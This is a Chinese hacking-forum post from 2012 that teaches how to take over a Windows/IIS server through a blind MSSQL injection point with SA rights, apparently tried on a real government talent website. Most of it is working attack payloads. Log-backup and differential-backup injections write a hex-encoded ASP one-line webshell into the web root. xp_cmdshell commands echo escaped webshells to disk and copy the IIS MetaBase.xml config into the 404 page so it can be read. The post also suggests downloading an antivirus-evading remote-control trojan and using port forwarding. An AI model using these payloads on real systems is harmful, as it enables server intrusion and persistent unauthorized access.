找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2121|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
6 K2 W8 f9 \2 r- m  t) x/ C! I0 \7 I2 x- E

# k( _) a/ _4 g                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
$ X% @! o4 g2 j, f) W* i$ b# V; ~+ _& V7 p0 B. K$ z
                                                                 * D: ~# C; C3 m& L
                                                                 
0 t/ i3 G+ n4 `8 R. Q                                                                  论坛: http://www.90team.net/
% ]3 ]5 M- M6 s3 W  j1 Y
. o. v: U- c, c8 D
; [2 [! H3 t7 Z; j; n" D7 I
; m/ {  ~# s/ U+ M友情检测国家人才网
" J- u4 S  b: v, }) |) {
8 a2 B9 P. v- d  D3 D# H' ^$ v4 s! y, r( `' @- d
内容:MSSQL注入SA权限不显错模式下的入侵
' h3 p4 L/ @) r: U: ^
- a6 ^# b9 b& n. Z
! x8 P& {% G: G6 k5 B3 Z# q/ s: J4 T一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。4 y5 {/ E. J, I6 Z6 g% |; o* R
2 |5 T+ @) E  E5 L) h4 r. c
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
- [2 ?/ t) ?( X+ ?; y2 H" K7 [3 p8 k- r' Z1 n/ o
+ r- G# }2 e' ]' {
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。/ }; \9 Y* S# m1 D# i, P7 u# ~
* a. L( n, s$ E7 F
思路:2 c% y: V8 ^3 M" y; g
2 T3 C2 w7 a. q* r, t9 {
首先:
; d0 A/ K9 D1 q  H  A( G2 L* K; e$ w# N! H! h, J
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
7 q/ b$ d* l( X* r5 c2 N/ h5 c# W
1.日志备份获得Webshell
6 }: N* R" ^  t7 N  j. ]/ ], T: |+ n/ V) o+ z
2.数据库差异备份获得Webshell& Q% U& g" |% G- h/ a
& c8 A* H0 {7 Y, H5 i
4.直接下载免杀远控木马。
4 k5 ?. r2 O5 v: n& b# r" z. d& v8 h/ n; _
5.直接下载LCX将服务器端口转发出来1 h7 i3 P6 |5 [
6 B7 O9 B4 U8 }/ C7 R
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。9 y9 q' _4 G0 G/ I9 t5 S, ?
7 d: d  v& e/ L: l8 i# i* e

8 R0 ^, Z4 W# y4 o( J6 [: B, M) e1 ^# Q/ M0 U- I) p
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, ' B7 \% x: P: r
' M" m# d5 V: D9 ]2 }
我直接演示后面一个方法
3 g  W" ~7 l5 ]( L+ y
& X, t: a" W+ L3 L$ V3 O2 P5 F! u. z9 g& Z
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
, ~/ J8 N# I9 B
- ~5 J5 H4 _! m& s" E. I/ R& I2 P7 q% [

$ J( J6 p5 T% [* o9 E- V; G* C% v) \* h8 i6 s. R( G8 X9 |+ f% {4 `4 l: o
◆日志备份:4 w0 h( p( l+ X, Q6 {* V- Z
/ w: c6 f, p2 P' V
: f3 o* m# ^; V1 I  E
1. 进行初始备份
% Y; m& Q0 \: N, H8 D3 z; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
. j% X& f0 O! B( t2 u+ W
. Q/ L& O. A) d( F7 u2. 插入数据  Y) m  y2 b3 y8 m8 z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--" S4 Z! S6 x7 j% Y
& e+ B8 C+ i3 _9 Q0 d
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
6 n9 Z6 x) \# N! a- ]; \& M  * P" \! p* @9 v* J
3. 备份并获得文件,删除临时表) a3 X0 {2 `  t! m- X$ r
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
  p6 {: L* `* m
# G% D7 J7 x' M) h' p" S+ s5 N- w) t. m' x
) Q  u: I* ~2 W6 e& f2 l
◆数据库差异备份+ m5 Q, }0 d5 `  G3 k
) w$ r) H( f2 J! B5 f6 R. C8 F4 m, i
(1. 进行差异备份准备工作2 }2 y) u$ e6 |$ A. @+ ~7 e- q

0 I5 X7 X) K7 d4 j2 V& Z;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--! C9 Z+ P  }& m

; Q7 |' D; Y2 Z* a# M上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码- |/ S! `# X/ w5 c, |

2 Y7 [# W7 r- w& _! {* _
, p7 s( b& m) G9 r(2. 将数据写入到数据库
. M3 G& ^3 E) T% {;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- % }. a1 y+ f2 z

* s) Y3 u; e  e9 ]- L$ `) s0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
1 ]* ?# w* m9 _* h3 }0 l- H- N- w4 B! T6 m
3. 备份数据库并清理临时文件
# M, e5 m1 [% ?" @& r* x$ l5 t2 R- _5 L* e1 b
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
, J# ~( U' G3 W1 j% Q( |# ~
% l3 i1 A) x) G( {0 M3 U0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 : \1 P) p- @+ `
9 N, B6 H3 I/ R6 R

( r$ G6 r3 ~! b( T) p+ D8 @8 r7 g% t* D8 c, Q
用^转义字符来写ASP(一句话木马)文件的方法:   
9 e! o( a& f" V+ l9 I! G, ~: u; m, N) A/ `- |
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--$ b8 H9 L% B% K5 E0 o7 \& F

8 K. X* c; z& R  E$ _1 U4 u2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp * n+ t1 s7 I; k: c) Y3 q$ o# N# c# u+ |
2 ?. d& W2 J4 l  D0 Y, Z9 R
读取IIS配置信息获取web路径9 T2 k/ u# T8 [# |4 s9 R# L

0 m% q9 k* Y5 r4 ^6 t2 H& l& q     
% F' D2 z* Z4 _# d# k& `. @8 \     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
4 F9 d" a3 M4 g$ v4 B/ _9 U& {$ v. t0 o) O: n0 _) Z2 n. W
执行命令1 F3 F4 z1 y$ D: x7 J+ d
     
8 E* K3 [* F9 x, g     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--, m: |& E' k( {% r* a" R7 Z6 c$ r

- I6 m6 Y% e! z2 h2 Z. |+ ?4 F- u" v) ~$ p" W

( Q! r5 K1 n! q
+ E3 H& k$ g* E9 I
4 i, W; |9 U) m/ X2 c; `8 w5 s! @- `( h/ o/ M6 B- r
! x* `0 G! h+ b" V( I, {
0 i) t$ [* Y  k0 o, W" m% i
* ?9 C5 j  b1 `

, u7 f: t( E, }# j3 C% A% \6 i- O  O4 g" d$ I- S% ]& W  Q9 L
. Q: M4 Y+ c3 ]- S1 ^! O

4 B4 s0 d9 o+ o$ m$ _
' d, n8 }* z: T% V9 ?
- Z6 T% V& [2 T1 y, J. n- F
2 W2 W( d, z  k4 y& H+ \, o  @* ~, l2 P/ Z9 t( W7 e( ~
% ~1 S7 `. Z+ U4 r
. c& I# U% Q/ S) m/ @
+ Z; G$ D% G9 ?- X8 V1 K
) f% D8 G7 I% S) S4 I. T, Z; f& a
8 G0 s( i4 ]3 c5 {( a  A
& \- `1 a. H% P$ W: O

( H" @. S. m1 Z, n' D6 j6 d5 C0 G3 [/ K; P4 T. p
. H5 [; K$ M/ `$ ?; U) b/ \
7 S' T; b" o) G, U. H2 g6 d) p

+ o0 h8 C3 G8 g. D& a0 r% U
3 V% r& |* X2 M. P5 V, H
, \: `( W: f4 @* @& F
% Z! V1 S8 f" G* Z4 ?( i! D; [; k5 q7 N0 k) g8 V. s! L

2 |! t$ _6 R8 Y0 i. o2 Q4 L6 B1 N' }/ M2 ?4 G0 A# D
7 A: ?$ q+ K4 ?% ^* ?* l
$ r% o. w( ?9 v6 p1 \4 _! I
: O8 W: |$ d8 {; R
( _/ c* T( _+ L% X7 i* a' s# r

0 T' n+ m* ]# V  j$ Y$ k
& j; z1 X8 e2 [1 A
( V. ?" H& ]5 j8 D- |9 ^4 Z
% D9 |( Y& K+ o% m7 a6 r1 S+ Z8 q3 _; y# [- Q
1 D- M# W5 @/ I" w1 Z
( c; M2 @2 o8 K2 V1 B) q% E/ `

( _% H% |5 o! @
5 J% L6 X; J" h! w& m& |1 P5 ~: z3 a/ x) |: H$ P3 o9 k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表